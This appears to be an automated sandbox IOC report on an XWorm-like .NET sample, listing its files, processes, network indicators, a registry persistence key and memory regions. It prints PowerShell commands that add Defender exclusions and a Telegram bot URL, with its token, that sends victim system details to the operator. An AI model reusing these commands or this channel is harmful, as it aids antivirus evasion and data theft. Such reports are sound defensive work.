IOC Report
9RgE5uOJwX.exe

loading gif

Files

File Path
Type
Category
Malicious
9RgE5uOJwX.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\MicrosoftClient.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MicrosoftClient.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1200f3fr.umw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3m4ooqvu.rkx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c22fplgp.ftk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evg5ljc0.lbp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqehw504.zrr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1ap1a4r.nhh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jehizhgh.tgs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfmc1crw.fnu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lbx5p13a.aei.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odk4swbj.ptx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t34fekhc.utb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpjrcxtd.zeq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_varukukj.bly.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxaurn3.kw0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zs4qdwzl.de4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zv3n0vpr.wqm.ps1
ASCII text, with no line terminators
dropped
There are 10 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\9RgE5uOJwX.exe
"C:\Users\user\Desktop\9RgE5uOJwX.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
malicious
C:\Users\user\AppData\Local\MicrosoftClient.exe
"C:\Users\user\AppData\Local\MicrosoftClient.exe"
malicious
C:\Users\user\AppData\Local\MicrosoftClient.exe
"C:\Users\user\AppData\Local\MicrosoftClient.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
vehicle-temp.gl.at.ply.gg
malicious
https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6
149.154.167.220
malicious
http://nuget.org/NuGet.exe
unknown
http://www.microsoft.coiops
unknown
https://api.telegram.org
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://api.telegram.org/bot
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
http://crl.mic
unknown
https://contoso.com/Icon
unknown
http://crl.micft.cMicRosof
unknown
https://aka.ms/pscore68
unknown
https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=72470
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 12 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
vehicle-temp.gl.at.ply.gg
147.185.221.23
malicious
api.telegram.org
149.154.167.220
malicious

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
malicious
147.185.221.23
vehicle-temp.gl.at.ply.gg
United States
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
MicrosoftClient
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\9RgE5uOJwX_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
13028000
trusted library allocation
page read and write
malicious
CF2000
unkown
page readonly
malicious
CC66C7E000
stack
page read and write
7FFD346D0000
trusted library allocation
page execute and read and write
2A707F10000
trusted library allocation
page read and write
76F4EFA000
stack
page read and write
7FFD34710000
trusted library allocation
page read and write
200F031C000
heap
page read and write
117F000
heap
page read and write
20080D85000
trusted library allocation
page read and write
7DF4A74F0000
trusted library allocation
page execute and read and write
7FFD342F0000
trusted library allocation
page read and write
2A707F21000
trusted library allocation
page read and write
200F0540000
heap
page readonly
2A708371000
trusted library allocation
page read and write
2A71F4AE000
heap
page read and write
200F05C0000
trusted library allocation
page read and write
18679F7B000
heap
page read and write
7FFD342CB000
trusted library allocation
page read and write
7FFD34530000
trusted library allocation
page read and write
CC66E7D000
stack
page read and write
18677D6D000
heap
page read and write
CC669EE000
stack
page read and write
20080C03000
trusted library allocation
page read and write
12E41000
trusted library allocation
page read and write
18600229000
trusted library allocation
page read and write
2A71F8A6000
heap
page read and write
7FFD345F0000
trusted library allocation
page read and write
2A70537B000
heap
page read and write
200812A9000
trusted library allocation
page read and write
7FFD3470D000
trusted library allocation
page read and write
1D06E000
stack
page read and write
7FFD344F0000
trusted library allocation
page read and write
20090071000
trusted library allocation
page read and write
18601E00000
trusted library allocation
page read and write
1C6BD000
stack
page read and write
7FFD34560000
trusted library allocation
page read and write
76F4CF8000
stack
page read and write
7FFD34380000
trusted library allocation
page execute and read and write
186013C5000
trusted library allocation
page read and write
2A71F8E1000
heap
page read and write
1350000
heap
page read and write
CC66FF9000
stack
page read and write
456B8E000
stack
page read and write
7FFD3431C000
trusted library allocation
page execute and read and write
23A1A0C6000
heap
page read and write
20081784000
trusted library allocation
page read and write
18600D7D000
trusted library allocation
page read and write
2A706DE0000
heap
page read and write
7FFD34480000
trusted library allocation
page execute and read and write
18677D75000
heap
page read and write
23A00181000
heap
page read and write
20090001000
trusted library allocation
page read and write
20080BFB000
trusted library allocation
page read and write
2A7071DA000
trusted library allocation
page read and write
2A708819000
trusted library allocation
page read and write
1867A1F2000
heap
page read and write
7FFD34400000
trusted library allocation
page execute and read and write
23A1A11D000
heap
page read and write
18677D43000
heap
page read and write
1C27B000
stack
page read and write
7FFD346B0000
trusted library allocation
page read and write
200F2777000
heap
page read and write
7FFD34540000
trusted library allocation
page read and write
D02000
unkown
page readonly
200F1E90000
heap
page execute and read and write
AC79D4D000
stack
page read and write
7FFD34480000
trusted library allocation
page read and write
CC67C4E000
stack
page read and write
7FFD34498000
trusted library allocation
page read and write
2A71F790000
heap
page read and write
1867A0BF000
heap
page read and write
2A71F925000
heap
page read and write
1867A1EF000
heap
page read and write
2A7172A9000
trusted library allocation
page read and write
7FFD346F0000
trusted library allocation
page read and write
7FFD346C0000
trusted library allocation
page read and write
7FFD34376000
trusted library allocation
page read and write
7FFD34639000
trusted library allocation
page read and write
200F2327000
heap
page read and write
200F2385000
heap
page read and write
1BF7E000
stack
page read and write
18679EB8000
heap
page read and write
2A708901000
trusted library allocation
page read and write
1330000
trusted library allocation
page read and write
23A1A090000
heap
page read and write
7FFD342B4000
trusted library allocation
page read and write
200902EA000
trusted library allocation
page read and write
7FFD34750000
trusted library allocation
page read and write
2A71F7EC000
heap
page read and write
1BC0E000
stack
page read and write
7FFD346D0000
trusted library allocation
page read and write
200813C5000
trusted library allocation
page read and write
76F4F7F000
stack
page read and write
456B0C000
stack
page read and write
7FFD345C0000
trusted library allocation
page read and write
200902F7000
trusted library allocation
page read and write
1B97F000
stack
page read and write
11FC000
heap
page read and write
18601782000
trusted library allocation
page read and write
7DF401EF0000
trusted library allocation
page execute and read and write
7FFD34660000
trusted library allocation
page read and write
7FFD342DB000
trusted library allocation
page read and write
18600BFB000
trusted library allocation
page read and write
200F27B3000
heap
page read and write
1867A19E000
heap
page read and write
2A70806B000
trusted library allocation
page read and write
186799F0000
trusted library allocation
page read and write
23A0016C000
heap
page read and write
AC789DE000
stack
page read and write
2A717021000
trusted library allocation
page read and write
7FFD343C6000
trusted library allocation
page execute and read and write
7FFD34710000
trusted library allocation
page read and write
7FFD34530000
trusted library allocation
page read and write
18679FB3000
heap
page read and write
2E51000
trusted library allocation
page read and write
23A1A0E7000
heap
page read and write
7FFD342C0000
trusted library allocation
page read and write
7FFD34500000
trusted library allocation
page read and write
7FFD344E0000
trusted library allocation
page read and write
7FFD34450000
trusted library allocation
page read and write
18677D6A000
heap
page read and write
18679E80000
heap
page read and write
20080A52000
trusted library allocation
page read and write
2A7172A1000
trusted library allocation
page read and write
20080001000
trusted library allocation
page read and write
23A1A0E5000
heap
page read and write
200F0615000
heap
page read and write
E60000
trusted library allocation
page read and write
1CA70000
heap
page read and write
2A705305000
heap
page read and write
7FFD3461C000
trusted library allocation
page read and write
2A71F91E000
heap
page read and write
2A71F92A000
heap
page read and write
E55000
heap
page read and write
7FFD342E4000
trusted library allocation
page read and write
7FFD345B0000
trusted library allocation
page read and write
20080E92000
trusted library allocation
page read and write
23A1A4FD000
heap
page read and write
1166000
heap
page read and write
CC66D7E000
stack
page read and write
CC67D4C000
stack
page read and write
7FFD344F0000
trusted library allocation
page read and write
2E93000
heap
page read and write
23A00120000
heap
page read and write
A00000
unkown
page readonly
23A0017E000
heap
page read and write
200902F1000
trusted library allocation
page read and write
200F0577000
heap
page execute and read and write
7FFD3436C000
trusted library allocation
page execute and read and write
76F48FE000
stack
page read and write
186798D0000
heap
page read and write
7FFD34604000
trusted library allocation
page read and write
1BADD000
stack
page read and write
7FFD346C0000
trusted library allocation
page read and write
18601867000
trusted library allocation
page read and write
200F0610000
heap
page read and write
23A02D9D000
trusted library allocation
page read and write
18610241000
trusted library allocation
page read and write
18610031000
trusted library allocation
page read and write
7FFD34461000
trusted library allocation
page read and write
186018F0000
trusted library allocation
page read and write
23A1A360000
heap
page read and write
2A716FE1000
trusted library allocation
page read and write
2A706D10000
trusted library allocation
page read and write
7FFD34613000
trusted library allocation
page read and write
2A708DB3000
trusted library allocation
page read and write
2A71F5D5000
heap
page read and write
2A705300000
heap
page read and write
7FFD342D4000
trusted library allocation
page read and write
7FFD345B0000
trusted library allocation
page read and write
2D30000
heap
page read and write
7FFD342C3000
trusted library allocation
page execute and read and write
7FFD34630000
trusted library allocation
page read and write
18679FD7000
heap
page read and write
20080FC3000
trusted library allocation
page read and write
18679E76000
heap
page execute and read and write
7FFD342CD000
trusted library allocation
page execute and read and write
18679FB0000
heap
page read and write
11D0000
heap
page read and write
7FFD342B0000
trusted library allocation
page read and write
1C008000
heap
page read and write
20080F78000
trusted library allocation
page read and write
7FFD34494000
trusted library allocation
page read and write
1B77E000
stack
page read and write
7FFD3462C000
trusted library allocation
page read and write
7FFD342D0000
trusted library allocation
page read and write
7FFD344F0000
trusted library allocation
page read and write
2A71F509000
heap
page read and write
2A706EA0000
heap
page read and write
1BBDE000
stack
page read and write
7FFD345C0000
trusted library allocation
page read and write
1B9B0000
heap
page read and write
18600C07000
trusted library allocation
page read and write
CC67CCC000
stack
page read and write
23A01C41000
trusted library allocation
page read and write
F1F000
heap
page read and write
2A71F90E000
heap
page read and write
23A1A0D8000
heap
page read and write
23A02C0D000
trusted library allocation
page read and write
7FFD342E3000
trusted library allocation
page execute and read and write
EFE000
heap
page read and write
7FFD34530000
trusted library allocation
page read and write
7FFD345D0000
trusted library allocation
page read and write
23A01E68000
trusted library allocation
page read and write
23A11F39000
trusted library allocation
page read and write
18610308000
trusted library allocation
page read and write
E80000
trusted library allocation
page read and write
23A004B0000
trusted library allocation
page read and write
1CA5F000
stack
page read and write
12E48000
trusted library allocation
page read and write
200F033D000
heap
page read and write
23A01C3A000
heap
page read and write
7FFD342C3000
trusted library allocation
page execute and read and write
7FFD34370000
trusted library allocation
page read and write
1867A1A4000
heap
page read and write
200F2660000
heap
page read and write
200F0550000
heap
page read and write
7FFD34390000
trusted library allocation
page read and write
200F2460000
heap
page read and write
7FFD3447A000
trusted library allocation
page read and write
2A70542C000
heap
page read and write
23A11C71000
trusted library allocation
page read and write
7FFD346C0000
trusted library allocation
page read and write
2A7053C7000
heap
page read and write
1430000
heap
page read and write
7FFD344C4000
trusted library allocation
page read and write
200F0321000
heap
page read and write
DB0000
heap
page read and write
1867A150000
heap
page read and write
20080F6B000
trusted library allocation
page read and write
186010F2000
trusted library allocation
page read and write
2BD1000
trusted library allocation
page read and write
2A71F5D0000
heap
page read and write
7FFD346A0000
trusted library allocation
page read and write
455A77000
stack
page read and write
200F0364000
heap
page read and write
2A71F89E000
heap
page read and write
2008186A000
trusted library allocation
page read and write
200F27A5000
heap
page read and write
2A71F5A6000
heap
page execute and read and write
186012A9000
trusted library allocation
page read and write
45587E000
stack
page read and write
23A02D62000
trusted library allocation
page read and write
DA0000
heap
page read and write
7FFD342B0000
trusted library allocation
page read and write
23A11C41000
trusted library allocation
page read and write
1867A1DA000
heap
page read and write
23A1A44D000
heap
page read and write
20090021000
trusted library allocation
page read and write
18679FA0000
heap
page read and write
76F5AC7000
stack
page read and write
7FFD34710000
trusted library allocation
page read and write
7FFD34730000
trusted library allocation
page read and write
2A708185000
trusted library allocation
page read and write
7FFD344A8000
trusted library allocation
page read and write
7FFD345A0000
trusted library allocation
page read and write
200F04D0000
heap
page read and write
7FFD34710000
trusted library allocation
page execute and read and write
2CA0000
heap
page read and write
20081890000
trusted library allocation
page read and write
20081E23000
trusted library allocation
page read and write
18677D8D000
heap
page read and write
7FFD344A0000
trusted library allocation
page execute and read and write
7FFD34640000
trusted library allocation
page read and write
7FFD34540000
trusted library allocation
page read and write
132E000
stack
page read and write
7FFD342D0000
trusted library allocation
page read and write
200F273D000
heap
page read and write
7FFD34716000
trusted library allocation
page read and write
200F2670000
heap
page read and write
7FFD34610000
trusted library allocation
page read and write
18677D79000
heap
page read and write
2A71F911000
heap
page read and write
7FFD34370000
trusted library allocation
page read and write
23A1A5F0000
heap
page read and write
23A00128000
heap
page read and write
18600087000
trusted library allocation
page read and write
117C000
heap
page read and write
7FFD34470000
trusted library allocation
page execute and read and write
200818F3000
trusted library allocation
page read and write
7FFD342BD000
trusted library allocation
page execute and read and write
23A1A3BF000
heap
page read and write
18679F3B000
heap
page read and write
23A001A5000
heap
page read and write
3010000
heap
page read and write
7FFD344D0000
trusted library allocation
page read and write
AC79F4E000
stack
page read and write
76F5BCE000
stack
page read and write
23A01B70000
trusted library allocation
page read and write
18601E25000
trusted library allocation
page read and write
2A71F5A0000
heap
page execute and read and write
1234000
heap
page read and write
186010BF000
trusted library allocation
page read and write
23A1A0D6000
heap
page read and write
200F2590000
trusted library allocation
page read and write
23A02CFE000
trusted library allocation
page read and write
23A03A64000
trusted library allocation
page read and write
23A000B0000
heap
page read and write
2A708734000
trusted library allocation
page read and write
7FFD34550000
trusted library allocation
page read and write
23A001A7000
heap
page read and write
2A706D30000
trusted library allocation
page read and write
13021000
trusted library allocation
page read and write
455C37000
stack
page read and write
7FF48F9B0000
trusted library allocation
page execute and read and write
200F02A0000
heap
page read and write
23A1A296000
heap
page read and write
200F0325000
heap
page read and write
455E3F000
stack
page read and write
AC792FC000
stack
page read and write
7FFD34580000
trusted library allocation
page read and write
2A706F50000
trusted library allocation
page read and write
CC66EF6000
stack
page read and write
76F59CE000
stack
page read and write
20081214000
trusted library allocation
page read and write
200F0555000
heap
page read and write
7FFD345E0000
trusted library allocation
page read and write
2A705387000
heap
page read and write
BC0000
heap
page read and write
186102EE000
trusted library allocation
page read and write
7FFD34366000
trusted library allocation
page read and write
1453000
trusted library allocation
page read and write
7FFD344C8000
trusted library allocation
page read and write
7FFD3430C000
trusted library allocation
page execute and read and write
AC78FF7000
stack
page read and write
2A71F8D1000
heap
page read and write
7FFD34590000
trusted library allocation
page read and write
18677F20000
trusted library section
page read and write
23A01B50000
heap
page execute and read and write
7FFD346E0000
trusted library allocation
page read and write
23A1A27B000
heap
page read and write
7FFD34580000
trusted library allocation
page read and write
1BA0E000
stack
page read and write
23A1A4B8000
heap
page read and write
200F0368000
heap
page read and write
23A03A3F000
trusted library allocation
page read and write
7FFD3449A000
trusted library allocation
page read and write
CC67DCC000
stack
page read and write
7FFD342DD000
trusted library allocation
page execute and read and write
AC7927E000
stack
page read and write
7FFD34640000
trusted library allocation
page read and write
2A71F7A0000
heap
page read and write
23A1A3BB000
heap
page read and write
200F0290000
heap
page read and write
1120000
heap
page read and write
2EE0000
heap
page execute and read and write
200F2540000
heap
page execute and read and write
23A11CB2000
trusted library allocation
page read and write
23A034A5000
trusted library allocation
page read and write
23A034CC000
trusted library allocation
page read and write
7FFD342E0000
trusted library allocation
page read and write
7FFD34520000
trusted library allocation
page read and write
23A02F7C000
trusted library allocation
page read and write
11F0000
heap
page read and write
2E90000
heap
page read and write
7FFD34530000
trusted library allocation
page read and write
7FFD34370000
trusted library allocation
page execute and read and write
7FFD345C0000
trusted library allocation
page read and write
186102F0000
trusted library allocation
page read and write
23A11F2B000
trusted library allocation
page read and write
23A00080000
heap
page read and write
23A1A4BA000
heap
page read and write
23A02C46000
trusted library allocation
page read and write
2E41000
trusted library allocation
page read and write
20090309000
trusted library allocation
page read and write
4558FE000
stack
page read and write
2A706EA5000
heap
page read and write
1170000
heap
page execute and read and write
7FFD342B3000
trusted library allocation
page execute and read and write
7FFD34648000
trusted library allocation
page read and write
186004CE000
trusted library allocation
page read and write
AC78EFE000
stack
page read and write
12AF000
heap
page read and write
1D074000
heap
page read and write
2A71F7AE000
heap
page read and write
EC5000
heap
page read and write
23A00144000
heap
page read and write
4555EE000
stack
page read and write
12BD3000
trusted library allocation
page read and write
2A717358000
trusted library allocation
page read and write
2A708D8E000
trusted library allocation
page read and write
23A004C0000
heap
page read and write
2A706DA0000
trusted library allocation
page read and write
7DF4C8090000
trusted library allocation
page execute and read and write
10F4000
stack
page read and write
7FFD34760000
trusted library allocation
page read and write
23A033C0000
trusted library allocation
page read and write
18679FBE000
heap
page read and write
2A71F410000
heap
page read and write
12BD1000
trusted library allocation
page read and write
125F000
heap
page read and write
7FFD342DD000
trusted library allocation
page execute and read and write
76F4D79000
stack
page read and write
7FFD343D0000
trusted library allocation
page execute and read and write
7FFD3431C000
trusted library allocation
page execute and read and write
7FFD34366000
trusted library allocation
page read and write
18679E70000
heap
page execute and read and write
2A71F901000
heap
page read and write
7FFD34500000
trusted library allocation
page read and write
7FFD34470000
trusted library allocation
page execute and read and write
7FFD34460000
trusted library allocation
page execute and read and write
2A705381000
heap
page read and write
7FFD344E0000
trusted library allocation
page read and write
7FFD345A0000
trusted library allocation
page read and write
2A71F92D000
heap
page read and write
23A1A0D2000
heap
page read and write
7FFD34720000
trusted library allocation
page read and write
AC78C7E000
stack
page read and write
200902F9000
trusted library allocation
page read and write
7FFD343D0000
trusted library allocation
page execute and read and write
76F497E000
stack
page read and write
18601032000
trusted library allocation
page read and write
2A70537D000
heap
page read and write
7FFD346A2000
trusted library allocation
page read and write
CC6707E000
stack
page read and write
AC78F79000
stack
page read and write
1860130B000
trusted library allocation
page read and write
2A716FB1000
trusted library allocation
page read and write
1435000
heap
page read and write
7FFD34470000
trusted library allocation
page execute and read and write
3073000
trusted library allocation
page read and write
7FFD343A6000
trusted library allocation
page execute and read and write
1B67E000
stack
page read and write
1C8BA000
stack
page read and write
23A02692000
trusted library allocation
page read and write
7FFD34720000
trusted library allocation
page read and write
7FFD34360000
trusted library allocation
page read and write
7FFD343A6000
trusted library allocation
page execute and read and write
7FFD346E0000
trusted library allocation
page read and write
7FFD34494000
trusted library allocation
page read and write
7FFD34462000
trusted library allocation
page read and write
1C028000
heap
page read and write
456A89000
stack
page read and write
7FFD344D0000
trusted library allocation
page read and write
7FFD343A0000
trusted library allocation
page execute and read and write
CF0000
unkown
page readonly
186102EA000
trusted library allocation
page read and write
7FFD344D0000
trusted library allocation
page read and write
2A7082B3000
trusted library allocation
page read and write
7FFD3433C000
trusted library allocation
page execute and read and write
4559FE000
stack
page read and write
20081036000
trusted library allocation
page read and write
7FFD34640000
trusted library allocation
page read and write
2A71F4A6000
heap
page read and write
7FFD34615000
trusted library allocation
page read and write
2A70539B000
heap
page read and write
7FFD34570000
trusted library allocation
page read and write
2A705389000
heap
page read and write
200F0580000
heap
page read and write
121C000
heap
page read and write
7FFD34510000
trusted library allocation
page read and write
7FFD34482000
trusted library allocation
page read and write
23A02F49000
trusted library allocation
page read and write
7FFD346BE000
trusted library allocation
page read and write
CC66F78000
stack
page read and write
DC0000
heap
page read and write
7FFD34480000
trusted library allocation
page read and write
1B3AF000
heap
page read and write
7FFD34520000
trusted library allocation
page read and write
13049000
trusted library allocation
page read and write
18677F00000
heap
page read and write
7FFD34490000
trusted library allocation
page execute and read and write
AC79CCF000
stack
page read and write
1207000
heap
page read and write
2A71F4C8000
heap
page read and write
7FFD34590000
trusted library allocation
page read and write
23A01B60000
heap
page read and write
F05000
heap
page read and write
7FFD34491000
trusted library allocation
page read and write
E96000
heap
page read and write
CC668A3000
stack
page read and write
D05000
unkown
page readonly
20080C11000
trusted library allocation
page read and write
7FFD346E0000
trusted library allocation
page read and write
76F5A4C000
stack
page read and write
23A1A4B1000
heap
page read and write
200F22F0000
heap
page read and write
2A71729A000
trusted library allocation
page read and write
7FFD342D0000
trusted library allocation
page read and write
D13000
unkown
page readonly
7FFD342FD000
trusted library allocation
page execute and read and write
455BBE000
stack
page read and write
7FFD3471D000
trusted library allocation
page read and write
200F0560000
trusted library allocation
page read and write
AC78D79000
stack
page read and write
7FFD342DB000
trusted library allocation
page execute and read and write
7FFD342C0000
trusted library allocation
page read and write
18677F30000
trusted library section
page read and write
200F03D9000
heap
page read and write
18677D39000
heap
page read and write
186798E1000
heap
page read and write
7FFD346AC000
trusted library allocation
page read and write
7FFD34610000
trusted library allocation
page read and write
18610070000
trusted library allocation
page read and write
20080F74000
trusted library allocation
page read and write
7FFD34452000
trusted library allocation
page read and write
7FFD342C4000
trusted library allocation
page read and write
18677CD0000
heap
page read and write
7FFD3433C000
trusted library allocation
page execute and read and write
23A11F31000
trusted library allocation
page read and write
CC67E4E000
stack
page read and write
7FFD344B0000
trusted library allocation
page read and write
76F4C76000
stack
page read and write
200F02E0000
heap
page read and write
2A707F18000
trusted library allocation
page read and write
2A708251000
trusted library allocation
page read and write
76F4AF9000
stack
page read and write
7FFD34580000
trusted library allocation
page read and write
7FFD343C6000
trusted library allocation
page execute and read and write
1861049C000
trusted library allocation
page read and write
23A1A4BD000
heap
page read and write
1867A1CD000
heap
page read and write
23A0016A000
heap
page read and write
7FFD342CB000
trusted library allocation
page read and write
CC6692E000
stack
page read and write
1265000
heap
page read and write
AC78CFE000
stack
page read and write
F61000
heap
page read and write
23A1A118000
heap
page read and write
7FFD34614000
trusted library allocation
page read and write
18677D30000
heap
page read and write
2D00000
heap
page execute and read and write
18601124000
trusted library allocation
page read and write
200F2344000
heap
page read and write
7FFD34720000
trusted library allocation
page read and write
CC670FE000
stack
page read and write
23A01AE0000
heap
page readonly
45690E000
stack
page read and write
23A1A1D0000
heap
page execute and read and write
7FFD342B3000
trusted library allocation
page execute and read and write
7FFD342C4000
trusted library allocation
page read and write
306F000
trusted library allocation
page read and write
23A00164000
heap
page read and write
AC78DFE000
stack
page read and write
7FFD344C0000
trusted library allocation
page read and write
7FFD34560000
trusted library allocation
page read and write
7FFD342D4000
trusted library allocation
page read and write
7FFD34610000
trusted library allocation
page read and write
2A71F811000
heap
page read and write
23A01BA0000
trusted library allocation
page read and write
76F4B7D000
stack
page read and write
7FFD34570000
trusted library allocation
page read and write
7FFD342F0000
trusted library allocation
page read and write
7FFD346CC000
trusted library allocation
page read and write
1867A1D1000
heap
page read and write
76F4E7E000
stack
page read and write
186102F8000
trusted library allocation
page read and write
23A001AA000
heap
page read and write
7FFD342B2000
trusted library allocation
page read and write
7FFD344E0000
trusted library allocation
page read and write
7DF4A7500000
trusted library allocation
page execute and read and write
7FFD346BC000
trusted library allocation
page read and write
7FFD344A0000
trusted library allocation
page execute and read and write
1490000
heap
page read and write
2A7080CE000
trusted library allocation
page read and write
2A71F938000
heap
page read and write
2A71F872000
heap
page read and write
7FFD34461000
trusted library allocation
page read and write
7FFD343D0000
trusted library allocation
page execute and read and write
2A707BB3000
trusted library allocation
page read and write
ED1000
heap
page read and write
18600BFF000
trusted library allocation
page read and write
7FFD344A0000
trusted library allocation
page execute and read and write
7FFD34540000
trusted library allocation
page read and write
200F0510000
trusted library allocation
page read and write
15F0000
heap
page read and write
23A02BDD000
trusted library allocation
page read and write
2A70890A000
trusted library allocation
page read and write
18677F60000
trusted library allocation
page read and write
AC790FF000
stack
page read and write
7FFD34720000
trusted library allocation
page read and write
2E4F000
trusted library allocation
page read and write
23A11E49000
trusted library allocation
page read and write
7FFD34498000
trusted library allocation
page read and write
AC78913000
stack
page read and write
23A000F0000
heap
page read and write
7FFD346B0000
trusted library allocation
page read and write
23A0358D000
trusted library allocation
page read and write
2A706FA0000
heap
page execute and read and write
23A1A123000
heap
page read and write
18677CF0000
heap
page read and write
F51000
heap
page read and write
455DBF000
stack
page read and write
18677F80000
trusted library allocation
page read and write
18679880000
heap
page execute and read and write
1CA1E000
stack
page read and write
1B9D0000
heap
page execute and read and write
1B80F000
stack
page read and write
200F0570000
heap
page execute and read and write
7FFD34620000
trusted library allocation
page read and write
200F275E000
heap
page read and write
7FFD344C0000
trusted library allocation
page read and write
7DF401EE0000
trusted library allocation
page execute and read and write
2A71F7F9000
heap
page read and write
2A707F14000
trusted library allocation
page read and write
7FFD34492000
trusted library allocation
page read and write
E50000
heap
